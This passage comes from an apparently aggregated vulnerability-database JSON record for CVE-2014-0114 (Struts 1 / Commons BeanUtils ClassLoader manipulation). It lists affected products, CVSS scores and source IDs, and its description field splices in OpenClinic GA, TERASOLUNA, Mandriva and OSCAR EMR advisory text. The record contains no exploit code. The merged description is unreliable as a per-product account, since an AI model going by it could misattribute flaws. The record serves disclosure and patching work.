            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "tivoli provisioning manager for software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "global link manager software (linux(suse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "weblogic server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1.3"
          },
          {
            "_id": null,
            "model": "network satellite server (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6)5.6"
          },
          {
            "_id": null,
            "model": "smart analytics system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "56002"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-08"
          },
          {
            "_id": null,
            "model": "content navigator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "infosphere identity insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "retail invoice matching",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "raplication manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "smart analytics system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "76000"
          },
          {
            "_id": null,
            "model": "tivoli netcool/omnibus web gui",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "device manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.0-00"
          },
          {
            "_id": null,
            "model": "retail clearance optimization engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "arx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "device manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.0-00"
          },
          {
            "_id": null,
            "model": "security threat response manager 2012.1r7",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "global link manager software (linux(rhel",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-01"
          },
          {
            "_id": null,
            "model": "security threat response manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "2013.2"
          },
          {
            "_id": null,
            "model": "device manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.1-02"
          },
          {
            "_id": null,
            "model": "retail invoice matching",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "terasoluna server framework for java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ntt data",
            "version": "2.01"
          },
          {
            "_id": null,
            "model": "identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.21.0"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.2.0-00"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.3.1"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "tuning manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-05"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.0-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.4-00"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "xp p9000 replication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.0.0-00"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.00"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.13"
          },
          {
            "_id": null,
            "model": "primavera p6 enterprise project portfolio management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "16.2"
          },
          {
            "_id": null,
            "model": "fusion middleware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.1.5.0"
          },
          {
            "_id": null,
            "model": "device manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.0-00"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5.0.1"
          },
          {
            "_id": null,
            "model": "enterprise data quality",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.2"
          },
          {
            "_id": null,
            "model": "predictive insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "jdeveloper",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1.20.0"
          },
          {
            "_id": null,
            "model": "infosphere information server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.2.0"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "jdeveloper",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1.30"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "insurance ifrs analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "178.0.6"
          },
          {
            "_id": null,
            "model": "fusion middleware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.22.0"
          },
          {
            "_id": null,
            "model": "weblogic server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1.3.0"
          },
          {
            "_id": null,
            "model": "tivoli system automation application manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.2"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "tuning manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-03"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-50-09"
          },
          {
            "_id": null,
            "model": "smart analytics system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10500"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-08"
          },
          {
            "_id": null,
            "model": "tuning manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "retail allocation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "retail central office 12.0.9in",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "utilities framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.1.0.2.0"
          },
          {
            "_id": null,
            "model": "smart analytics system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "77000"
          },
          {
            "_id": null,
            "model": "communications webrtc session controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "global link manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-01"
          },
          {
            "_id": null,
            "model": "websphere partner gateway express edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "global link manager software (linux(suse",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-01"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-10"
          },
          {
            "_id": null,
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.0.0"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.2.2.145"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.010"
          },
          {
            "_id": null,
            "model": "raplication manager software (linux(rhel",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.1"
          },
          {
            "_id": null,
            "model": "weblogic server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.0.2"
          },
          {
            "_id": null,
            "model": "raplication manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "device manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-08"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1.13"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "communications webrtc session controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "device manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-08"
          },
          {
            "_id": null,
            "model": "retail markdown optimization",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.1.1"
          },
          {
            "_id": null,
            "model": "infosphere mashuphub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "vcenter server update",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.52"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "tivoli provisioning manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.021"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.1"
          },
          {
            "_id": null,
            "model": "device manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.6.1-06"
          },
          {
            "_id": null,
            "model": "retail allocation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "contact optimization",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.1-02"
          },
          {
            "_id": null,
            "model": "device manager software (solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1.1-00(x64))"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop workstation client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-00"
          },
          {
            "_id": null,
            "model": "manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "111.7"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-00-01"
          },
          {
            "_id": null,
            "model": "websphere enterprise service bus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "tuning manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.4.0-02"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-01"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.2.1-00"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "device manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.3.0-00"
          },
          {
            "_id": null,
            "model": "tivoli provisioning manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "device manager software (solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.2-00(x64))"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "web interface for content management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.4"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1-03"
          },
          {
            "_id": null,
            "model": "weblogic server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1.20"
          },
          {
            "_id": null,
            "model": "tuning manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.4.0-01"
          },
          {
            "_id": null,
            "model": "weblogic server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.3.60"
          },
          {
            "_id": null,
            "model": "lotus quickr for websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-00-02"
          },
          {
            "_id": null,
            "model": "retail allocation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-07"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.4"
          },
          {
            "_id": null,
            "model": "tivoli integrated portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "contact optimization",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "67121"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-581"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006468"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000056"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0114"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:nttdata:terasoluna_server_framework_for_java_web",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000056"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Rene Gielen",
        "sources": [
          {
            "db": "BID",
            "id": "67121"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-581"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2014-0114",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2014-0114",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "IPA",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2014-000056",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "IPA",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-006468",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-0114",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2020-006468",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2014-000056",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201404-581",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2014-0114",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0114"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-581"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006468"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000056"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0114"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. An information management system for hospitals that can manage data such as financial management, clinical practice, and pharmacies. OpenClinic GA There are multiple vulnerabilities in. OpenClinic GA The following vulnerabilities exist in. * Avoid authentication via another path or channel (CWE-288) - CVE-2020-14485* Inappropriate restriction of excessive authentication attempts (CWE-307) - CVE-2020-14484* Improper authentication (CWE-287) - CVE-2020-14494* Lack of certification (CWE-862) - CVE-2020-14491* Execution with unnecessary privileges (CWE-250) - CVE-2020-14493* Unlimited upload of dangerous types of files (CWE-434) - CVE-2020-14488* Path traversal (CWE-22) - CVE-2020-14490* Inappropriate authorization process (CWE-285) - CVE-2020-14486* Cross-site scripting (CWE-79) - CVE-2020-14492* Use of unmaintained third-party products (CWE-1104) - CVE-2020-14495 , CVE-2016-1181 , CVE-2016-1182 Due to * Inadequate protection of credentials (CWE-522) - CVE-2020-14489* Hidden features (CWE-912) - CVE-2020-14487 * However, this vulnerability is Version 5.89.05b Does not affectThe expected impact depends on each vulnerability, but it may be affected as follows. * A remote attacker initiates a session by bypassing client-side access control or sending a specially crafted request. SQL Performs administrator functions such as query execution - CVE-2020-14485* A remote attacker bypasses the system\u0027s account lock feature and brute force attacks ( Brute force attack ) Is executed - CVE-2020-14484* In this system, brute force attack ( Brute force attack ) Insufficient protection mechanism allows an unauthenticated attacker to access the system with more than the maximum number of attempts. - CVE-2020-14494* The system SQL Since it does not check the execution permission of the query, a user with lower permission can access information that requires higher permission. - CVE-2020-14491* In this system, with relatively low authority SQL It is possible to write any file by executing, and as a result, any command is executed on the system. - CVE-2020-14493* The system does not properly validate uploaded files, so a low-privileged attacker uploads and executes arbitrary files on the system. - CVE-2020-14488* Executing a file that contains any local file specified by a parameter exposes sensitive information or executes an uploaded malicious file. - CVE-2020-14490* By avoiding the redirect process that is executed when authentication fails, an unauthenticated attacker can execute a command illegally. - CVE-2020-14486* Malicious code is executed on the user\u0027s browser because the user\u0027s input value is not properly validated. - CVE-2020-14492* Known vulnerabilities in end-of-support third-party software used by the system (CVE-2014-0114 , CVE-2016-1181 , CVE-2016-1182) Malicious code executed by a remote attacker due to * There is a flaw in the hashing process when saving the password, and the password is stolen by a dictionary attack. - CVE-2020-14489* A user account set by default exists in the system in an accessible state, and an attacker can use that account to execute arbitrary commands. - CVE-2020-14487. TERASOLUNA Server Framework for Java(Web) provided by NTT DATA Corporation is a software framework for creating Java web applications. TERASOLUNA Server Framework for Java(Web) bundles Apache Struts 1.2.9, which contains a vulnerability where the ClassLoader may be manipulated (CVE-2014-0114). Therefore, this vulnerability affects TERASOLUNA Server Framework for Java(Web) as well.On a server where the product in running, a remote attacker may steal information or execute arbitrary code. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. \nApache Struts versions 1.0.0 through 1.3.10 are vulnerable. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\n http://advisories.mageia.org/MGASA-2014-0219.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n 2341ea3fd6c92a10ab4c0be7ef5ca9da  mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm\n 8d911347cc4fdb08383a2d6ad21860e6  mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm\n fc1e7ac540a1d4c923cf773769c976b2  mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm\n 3304297e4b88aae688e8edcdd11bf478  mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm \n b508c226756fcb2a82a8b5e2e84af466  mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 7e2abd47c0862fa5010ee686d76d2353  mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 96dd8e36bf4b46577498ad8616dce319  mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 37a1b595d7f2f73bdff8d13bcb70e0a6  mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 8c298a1e1e9e8ad81acb0166b2f18109  mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm \n b508c226756fcb2a82a8b5e2e84af466  mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Business Server 1/X86_64:\n 1e1b9440affefd05d5fe0c4860fdcd9b  mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm\n 5ae68b0b7f991676f67562a51dd956a7  mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm \n f135f96b6d2121b157b7a62afd449ea6  mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb\nHUtc9GTxbEwte2/fTU7bJ5M=\n=5Ewj\n-----END PGP SIGNATURE-----\n. Title: Multiple vulnerabilities in OSCAR EMR\nProduct: OSCAR EMR\nVendor: Oscar McMaster\nTested version: 15.21beta361\nRemediation status: Unknown\nReported by: Brian D. Hysell\n\n-----\n\nProduct Description:\n\n\"OSCAR is open-source Electronic Medical Record (EMR) software that\nwas first developed at McMaster University by Dr. David Chan. It is\ncontinuously enriched by contributions from OSCAR users and the\nCharter OSCAR Service Providers that support them. OSCAR has been\ncertified by OntarioMD, and verified as IHE compliant, achievements\nmade possible by the creation and success of OSCAR EMRas ISO\n13485:2003 certified Quality Management System.\"\n\n-----\n\nTimeline:\n\n29 Mar 2016 - Vendor contacted\n29 Mar 2016 - Vendor responded\n29 Apr 2016 - Vendor contacted for permission to share redacted report\nwith third party\n02 May 2016 - Vendor responded\n17 Jan 2017 - Lead developer contacted (no response)\n01 